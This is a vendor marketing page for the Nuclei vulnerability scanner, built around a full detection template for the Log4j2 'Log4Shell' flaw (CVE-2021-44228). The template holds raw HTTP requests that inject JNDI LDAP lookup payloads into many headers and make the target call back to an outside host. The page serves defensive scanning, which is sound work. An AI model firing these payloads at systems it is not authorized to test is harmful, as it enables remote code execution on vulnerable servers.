Effective vulnerability management starts with a better scanner

Nuclei detects exploitable vulnerabilities across every asset, so you can fix what matters without the noise.

Dashboard

Trusted by 100k+ security professionals

How ProjectDiscovery solves vulnerability management

Real, actionable findings that an attacker could exploit

Streamlined prioritization without false positives

Broadest coverage for all security risks, not just CVEs

Accelerated remediation with automated ticketing

Fewer vulnerabilities from false positives
97%
Manual triage time saved per incident
24 hours
Detection templates for real security risks
11,000+
Faster exploit coverage than traditional scanners
10x

Nuclei validates exploitability at runtime

Traditional vulnerability scanners like Tenable, Qualys, and Rapid7 rely on outdated techniques like version fingerprinting and static signatures. These rigid, black-box tools overwhelm teams with false positives and blind spots.

Direct behavioral checks

Support for complex request flows including value extraction and reuse, pipelining, request tampering, race conditions, and raw request crafting—enabling real-world attack simulation at scale.

Smart validation logic

Use flexible matchers to validate responses with precision—status codes, regex patterns, binary data, XPath, and more. Matchers are the core of Nuclei’s signal-over-noise approach to vulnerability detection.

Multi-protocol support

Nuclei goes beyond traditional web scanning, with support for DNS, TCP, headless browsers, and more. Templates can be run with or without authentication to test real-world attack paths anywhere in your environment.

Apache Log4j2 Remote Code Injection

1id: CVE-2021-44228
2

3info:
4  name: Apache Log4j2 Remote Code Injection
5  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo
6  severity: critical
7  description: |
8    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. 
9    An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
10  impact: |
11    Successful exploitation of this vulnerability can lead to remote code execution, potentially compromising the affected system.
12  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
13  reference:
14    - https://logging.apache.org/log4j/2.x/security.html
15    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
16    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
17    - https://www.lunasec.io/docs/blog/log4j-zero-day/
18    - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
19  classification:
20    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
21    cvss-score: 10
22    cve-id: CVE-2021-44228
23    cwe-id: CWE-20,CWE-917
24    epss-score: 0.94381
25    epss-percentile: 0.99959
26    cpe: cpe:2.3:o:siemens:6bk1602-0aa12-0tp0_firmware:*:*:*:*:*:*:*:*
27  metadata:
28    max-request: 2
29    vendor: siemens
30    product: 6bk1602-0aa12-0tp0_firmware
31  tags: cve2021,cve,rce,oast,log4j,injection,kev,apache
32variables:
33  rand1: '{{rand_int(111, 999)}}'
34  rand2: '{{rand_int(111, 999)}}'
35http:
36  - raw:
37      - |
38        GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
39        Host: {{Hostname}}
40      - |
41        GET / HTTP/1.1
42        Host: {{Hostname}}
43        Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
44        Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}
45        Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}
46        Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
47        Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
48        Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}
49        Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}
50        Cookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}
51        Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}
52        Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}
53        Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}
54        Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
55        User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}
56        X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
57        X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}
58        X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}
59        X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}
60        X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}
61    stop-at-first-match: true
62    matchers-condition: and
63    matchers:
64      - type: word
65        part: interactsh_protocol
66        words:
67          - "dns"
68      - type: regex
69        part: interactsh_request
70        regex:
71          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
72    extractors:
73      - type: kval
74        kval:
75      - type: regex
76        group: 2
77        regex:
78          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
79        part: interactsh_request
80      - type: regex
81        group: 1
82        regex:
83          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
84        part: interactsh_request
85        # digest: 4a0a0047304502202884fb76d02d44ae24b3e9bc5914a20e89726f929f3a1472cb9ce81e16f6c7320221009fb4e79fd5e58f4a49ccbeff467c990c3be6e32a7e03a2af8db207849e937d5f:922c64590222798bb761d5b6d8e72950
86# digest: 4a0a0047304502204ecff69d0cf6eff10fa830187e3bb11859e75c1901f1be914ec81bc02e7a9d8b02210097c7eec83c3c4e92ced242dcf77aeba969817fd0c9306fbc099450473f23d99a:922c64590222798bb761d5b6d8e72950

Nuclei templates are designed to run safely at scale. Each template is individually tested and reviewed by our team.

Faster detection. Faster protection.

ProjectDiscovery responds to critical vulnerabilities faster than legacy scanners.

CVE-2025-1974

IngressNightmare

A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)

Time to detection

5 hrs

ProjectDiscovery

2-5 days

Legacy scanners

Read the blog

  1. Public advisory & patch release

    Kubernetes and Wiz Research publicly disclosed CVE-2025-1974 and released patched Ingress NGINX versions 1.12.1 and 1.11.5.

  2. ProjectDiscovery publishes internal detection template

    A Nuclei template for internal network scanning of CVE-2025-1974 was released, enabling detection within private infrastructures.

    • Realtime automated scans triggered

    • Remediation workflows initiated

  3. Qualys publishes upgrade advisory

    Qualys released a blog post recommending users upgrade their Ingress NGINX controller to the patched versions to mitigate CVE-2025-1974.

  4. ProjectDiscovery publishes external detection template

    A Nuclei template for external scanning was released, allowing detection of CVE-2025-1974 from outside target networks.

    • External scanning available

  5. Rapid7 releases Cluster Scanner plugin

    Rapid7 launched the Kubernetes Cluster Scanner plugin with checks for CVE-2025-1974, enabling customers to validate patch status across their clusters.

  6. Tenable releases Nessus plugin #233656

    Tenable published a direct remote check plugin for Nessus, allowing automated scanning for CVE-2025-1974 on target systems.

  7. Scan for CVE-2025-1974

The vulnerability management lifecycle, reimagined

We're rethinking every step of the vulnerability management lifecycle to help teams detect more actionable findings and fix what actually matters.

Scope

Discover everything

We combine external recon and internal network discovery to build a complete, unified asset inventory

Scan

Detect real exploits

Nuclei validates exploitability at runtime to provide real, actionable results

Prioritize

Focus on what matters

Prioritize high-impact findings based on asset context like ownership, criticality, and exposure

Remediate

Fix risks faster

Create Jira tickets with a single click and validate fixes with instant retest

Monitor

Ensure vulnerabilities stay fixed

Automated regressions and continuous monitoring to ensure risks don't re-appear

ProjectDiscovery vs Traditional scanners

See how our modern approach to vulnerability management outperforms traditional solutions

Detection accuracy

Detects real, exploitable vulnerabilities(ProjectDiscovery)

Direct behavioral checks validate exploitability at runtime to eliminate false positives.

Noise and false positives(Traditional VM)

Version-based checks create alert fatigue and waste triage time.

Detection coverage

Broadest coverage for real security risks(ProjectDiscovery)

Over 11,000 detection templates covering the most exploited vulnerabilities on the internet.

CVE-based detections only(Traditional VM)

Detections only for known CVEs, which misses critical misconfigurations and other actively exploited security risks.

Time to detection

Real-time intelligence(ProjectDiscovery)

Rapid detection response from a global security community and ProjectDiscovery’s research team.

Delayed and opaque(Traditional VM)

Relies on commercial vendor updates that are slow and inaccurate.

Risk prioritization

Context-aware scoring(ProjectDiscovery)

Exploitability + asset context drastically reduce triage time.

Static severity scores(Traditional VM)

Relies on CVSS without real-world context or validation.

Customization

Adaptable and extensible templates(ProjectDiscovery)

Customize and write your own detection templates.

Rigid and black box(Traditional VM)

Limited to vendor-defined scanning capabilities without modification.

Target scope

Automated discovery with cloud integrations(ProjectDiscovery)

External and internal recon plus cloud integrations offer broadest coverage.

Bring your own assets(Traditional VM)

Lacks robust discovery capabilities, creating gaps in scope and coverage.

Real-time asset visibility kept their perimeter audit-ready

Scanned 14,500 assets in under 5 minutes during a critical CVE

Validated fixes instantly with one-click retests

Cut response noise by escalating only when necessary

Turned bug bounty findings into reusable detections

Read case studyView all

Featured stories

The latest in open source tools, recent exploits, Nuclei templates, and more.

View all
Solving Vulnerability Management: ProjectDiscovery’s RSA Innovation Sandbox Win

Solving Vulnerability Management: ProjectDiscovery’s RSA Innovation Sandbox Win

Authentication Bypass to RCE in Versa Concerto

Authentication Bypass to RCE in Versa Concerto

CVE-2025-29927: Next.js Middleware Authorization Bypass - Technical Analysis

CVE-2025-29927: Next.js Middleware Authorization Bypass - Technical Analysis